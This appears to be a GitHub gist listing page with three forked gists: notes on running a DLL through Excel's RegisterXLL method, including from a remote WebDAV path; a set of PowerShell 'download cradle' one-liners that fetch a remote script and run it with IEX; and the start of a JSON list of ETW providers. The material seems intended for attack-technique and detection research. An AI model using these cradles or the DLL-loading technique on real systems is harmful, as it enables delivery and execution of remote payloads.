
@Heirhabarov
Heirhabarov / ExcelXLL.md
Created January 8, 2018 22:39 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV; such files are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file; however, there is a security warning. @rxwx has more notes on this here inc

@Heirhabarov
Heirhabarov / DownloadCradles.ps1
Last active September 7, 2023 11:35 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
################################################## System.Net. cradles ##################################################
# System.Net.Webclient DownloadString
IEX (New-Object Net.Webclient).DownloadString('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1')
# System.Net.Webclient DownloadData
IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1')))
$test = (New-Object Net.Webclient).DownloadData('https://gist.githubusercontent.com/Heirhabarov/69105374b08b12ab10f215b0923119d2/raw/45896b2561cc9c577378a630817078fbcd0588f4/TestPSScript.ps1'); $st = [System.Text.Encoding]::ASCII.GetString($test); IEX $st
# System.Net.Webclient DownloadFile (touches disk)
Write-Host "Hello from PowerShell!!!"
Get-Process
<?xml version="1.0"?>
<command>
<a>
<execute>Write-Host "Hello from PowerShell!!!"; Get-Process</execute>
</a>
</command>
@Heirhabarov
Heirhabarov / NiftyETWProviders.json
Created July 19, 2019 14:59 — forked from mattifestation/NiftyETWProviders.json
ETW providers you never knew existed...
[
{
"ProviderGUID": "72d164bf-fd64-4b2b-87a0-62dbcec9ae2a",
"ProviderName": "AccEventTool",
"ProviderGroupGUID": "4f50731a-89cf-4782-b3e0-dce8c90476ba",
"AssociatedFilenames": [
"accevent.exe",
"inspect.exe",
"narrator.exe",
"srh.dll"